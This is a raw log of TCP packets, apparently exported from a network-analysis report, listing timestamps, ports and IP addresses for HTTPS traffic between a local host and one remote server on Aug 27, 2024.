                                                Aug 27, 2024 12:55:18.374068975 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374097109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.374118090 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.374622107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374634027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374696016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.374703884 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374757051 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.375183105 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.375201941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.375294924 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.375302076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.375370026 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.406579971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.406594992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.406708956 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.406717062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.406804085 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.459633112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.459650993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.459728003 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.459738016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.459805012 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.460175991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.460191965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.460270882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.460278988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.460338116 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.460650921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.460665941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.460727930 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.460727930 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.460736990 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.461354971 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.461519957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.461534977 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.461579084 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.461585045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.461618900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.461654902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.462042093 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462055922 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462124109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.462131023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462140083 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.462191105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.462348938 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462363958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462426901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.462434053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.462455988 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.463018894 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.463037968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.463085890 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.463098049 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.463138103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.463138103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.496088028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.496104002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.496189117 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.496198893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.496251106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.562355042 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562381029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562453032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.562465906 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562544107 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.562625885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562644005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562707901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.562716007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.562773943 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.563374996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.563390970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.563448906 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.563457012 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.563519001 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.564083099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564097881 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564162016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564169884 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.564182043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564220905 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564235926 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.564265966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.564270020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.564282894 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.564320087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.565074921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.565092087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.565150976 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.565171957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.565179110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.565218925 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.565252066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.582556963 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.582571983 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.582669020 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.582678080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.630635023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.649111986 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649127007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649238110 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.649245977 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649291039 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.649446964 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649461985 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649522066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.649528980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.649579048 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.650238037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650255919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650316954 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.650322914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650388002 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.650758028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650774956 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650827885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.650835991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.650892019 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.651439905 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651453972 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651516914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651520014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.651530027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651588917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.651592970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651604891 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.651667118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.652369022 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652388096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652506113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.652519941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652561903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.669876099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.669892073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.669955015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.669961929 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.670006990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737257957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737284899 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737348080 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737370968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737385035 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737421989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737962008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737977028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738030910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738042116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738085032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738671064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738696098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738770008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738770008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738779068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739329100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739343882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.739350080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739361048 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739398956 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.739447117 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.740081072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.740096092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.740147114 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.740153074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.740216970 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.743988991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744005919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744118929 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.744126081 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744177103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.744716883 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744730949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744776964 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.744784117 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.744813919 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.744834900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.758120060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.758135080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.758274078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.758307934 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.758420944 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.826252937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.826272011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.826389074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.826406956 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.826463938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.829435110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.829449892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.829525948 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.829534054 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.829586029 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.830301046 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.830317020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.830387115 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.830394983 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.830478907 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.831558943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.831573009 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.831674099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.831682920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.831733942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.833182096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.833195925 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.833271980 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.833280087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.833338976 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.836627007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.836641073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.836736917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.836744070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.836807966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.836951017 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.836966038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.837035894 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.837044001 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.837061882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.839329958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.845179081 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.845195055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.845280886 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.845289946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.845369101 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.914256096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.914272070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.914336920 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.914350033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.914439917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.914439917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.916738987 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.916759014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.916925907 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.916938066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.917006016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.917876959 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.917891026 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.918044090 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.918051004 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.918114901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.919260025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.919275045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.919353962 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.919359922 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.919456005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.920887947 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.920902014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.920999050 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.921006918 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.921077013 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.923958063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.923973083 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.924048901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.924057007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.924127102 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.924444914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.924458981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.924505949 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.924513102 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.924596071 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.932872057 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.932888031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.932955980 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.932974100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.933058023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.001898050 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.001919031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.002019882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.002037048 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.002080917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.005101919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005121946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005194902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.005203009 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005249977 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.005753040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005767107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005825043 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.005832911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.005908012 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.006978989 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.006993055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.007047892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.007055044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.007076979 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.007105112 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.008694887 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.008712053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.008774996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.008781910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.008836985 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.011651993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.011666059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.011732101 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.011739969 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.011795998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.012365103 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.012382984 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.012423038 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.012429953 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.012463093 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.012506008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.020395994 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.020411015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.020505905 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.020514011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.020569086 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.089380980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.089401960 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.089546919 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.089557886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.089642048 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.092216015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.092233896 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.092299938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.092307091 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.092353106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.092951059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.092967033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.093030930 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.093039036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.093105078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.094536066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.094552994 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.094625950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.094634056 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.094696045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.096043110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.096057892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.096132994 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.096139908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.096196890 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.099302053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099318027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099397898 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.099406004 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099643946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099663019 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099719048 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.099730968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.099740028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.103339911 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.108033895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.108050108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.108138084 CEST49707443192.168.2.552.216.214.209
